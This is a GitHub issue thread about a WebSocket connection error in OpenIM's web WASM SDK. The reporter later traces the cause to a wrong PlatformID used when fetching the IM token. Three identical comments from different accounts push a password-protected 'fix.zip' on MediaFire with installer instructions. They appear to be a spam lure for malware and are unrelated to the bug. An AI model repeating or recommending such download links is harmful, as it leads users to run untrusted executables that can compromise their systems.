### ISSUE TITLE
[BUG] wasm_exec.js:390 WebSocket connection error

### ISSUE THREAD

**Issue by OrrinHatch** [openimsdk/open-im-sdk-web-wasm#120]
### OpenIM Server Version

3.8.0

### Operating System and CPU Architecture

Linux (AMD)

### Deployment Method

Docker Deployment

### Bug Description and Steps to Reproduce

[taro-openIM-demo](https://github.com/OrrinHatch/taro-openIM-demo)

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bloomingg** [comment]
please check you im server.
I can run this demo and everything works fine.

**Comment by OrrinHatch** [comment]
this issue has been resolved. the backend was using the wrong PlatformID to obtain the IMtoken. 
thanks
